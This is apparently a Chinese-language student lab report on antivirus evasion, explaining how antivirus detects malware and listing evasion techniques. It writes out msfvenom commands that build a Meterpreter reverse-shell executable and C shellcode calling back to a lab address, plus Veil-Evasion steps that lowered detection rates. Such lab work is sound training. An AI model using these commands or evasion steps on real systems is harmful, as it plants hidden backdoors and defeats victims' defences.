Exp3 免殺原理與實踐

一、基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？

①基於特征碼的檢測：AV軟件廠商通過檢測一個可執行文件是否包含一段與特征碼庫中相匹配的特征碼從而判斷是否為惡意軟件。

②啟發式惡意軟件檢測：就是根據一個程序的特征和行為如果與惡意軟件相似，就判定為惡意軟件。

③基於行為的惡意軟件檢測：同啟發式，啟發式偏向於對程序的特征掃描，基於行為的則是多了對程序的行為監控。

（2）免殺是做什麽？

免殺就是使惡意軟件能不被AV軟件的檢測出來，其本身安裝的後門能夠不被發現，成功存活下來。

（3）免殺的基本方法有哪些？

1、改變特征碼：

如果是類似exe的可執行文件可以加殼，例如壓縮殼

如果是shellcode可以用encode進行編碼或者用payload重新編譯生成可執行文件

如果是源代碼可以用其他語言進行重寫再編譯（veil-evasion）

2、改變行為：

通訊方式：盡量使用反彈式連接、使用隧道技術、加密通訊數據

操作模式：基於內存操作、減少對系統的修改、加入混淆作用的正常功能代碼

3、非常規方法：

①使用一個有漏洞的應用當成後門，編寫攻擊代碼集成到如MSF

②使用社工類攻擊，誘騙目標關閉AV軟件。

③純手工打造一個惡意軟件。

二、實驗步驟

使用Msfvenom編碼器

使用指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.200.133 PORT=4311 -f exe > wangzhuoran01.exe 生成一個可執行文件放到網站 http://www.virscan.org 上檢測，結果如下：

可以發現檢測率有46%，說明裸後門文件被發現的可能性還是挺高的。於是我們試試多次編碼後會不會降低被檢測率。

使用Veil-Evasion

veil-evasion和Metasploit類似，可以生成後門文件，但Linux裏沒有需要我們自己安裝，用 sudo apt-get install veil-evasion 指令下載軟件包，下載好後輸入 veil 開始安裝。

安裝完成後自動進入 veil （下次想調用，輸入 veil 即可）。

list 指令可以查看可使用的工具，選擇 evasion （或者直接輸入 use evasion ）

同上 list 可查看可使用的 payload

使用 use 指令選擇一個工具，這裏我選擇了 8 號，然後設置一下 LHOST和 LPORT ，輸入generate 生成 exe 文件，命名一下就順利生成文件。（我最開始選擇的是 python ，然而要麽是生成出錯，要麽是最後無法生成exe文件，可能是我安裝過程有些問題，最後也只能放棄嘗試使用 c 了，好在一次就成功生成）。

生成完成後去那個目錄把文件復制到wIndows上檢測。

檢測率下降了挺多，只有15%了，然而還是會被 360 掃出來。

C語言調用Shellcode

輸入指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.200.133 LPORT=4311 -f c 生成一個c語言格式的Shellcode數組

網絡對抗 Exp3 免殺原理與實踐 20154311 王卓然